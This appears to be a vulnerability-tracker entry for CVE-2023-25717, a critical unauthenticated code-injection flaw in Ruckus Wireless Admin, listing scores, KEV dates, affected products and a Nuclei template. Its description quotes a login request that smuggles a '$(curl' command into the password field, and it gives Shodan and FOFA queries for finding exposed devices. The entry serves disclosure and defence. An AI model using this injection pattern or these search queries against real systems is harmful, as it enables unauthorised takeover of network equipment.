CVE-2023-25717
CRITICAL KEV NUCLEIRuckuswireless Ruckus Wireless Admin < 10.4 - Code Injection
Title source: ruleDescription
Ruckus Wireless Admin through 10.4 allows Remote Code Execution via an unauthenticated HTTP GET Request, as demonstrated by a /forms/doLogin?login_username=admin&password=password$(curl substring.
Nuclei Templates (1)
Ruckus Wireless Admin - Remote Code Execution
CRITICALVERIFIEDby parthmalhotra,pdresearch
Shodan:
title:"ruckus wireless" || http.title:"ruckus wireless"
FOFA:
title="ruckus wireless"
References (3)
Scores
CVSS v3
9.8
EPSS
0.9424
EPSS Percentile
99.9%
Attack Vector
NETWORK
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Details
CISA KEV
2023-05-12
VulnCheck KEV
2023-05-08
InTheWild.io
2023-05-12
ENISA EUVD
EUVD-2023-29627
CWE
CWE-94
Status
published
Products (4)
commscope/ruckus_smartzone_firmware
6.1.0.0.935
commscope/ruckus_smartzone_firmware
< 5.2.1.3
ruckuswireless/ruckus_wireless_admin
< 10.4
ruckuswireless/smartzone_ap
< 6.1.0.0.9240
Published
Feb 13, 2023
KEV Added
May 12, 2023
Tracked Since
Feb 18, 2026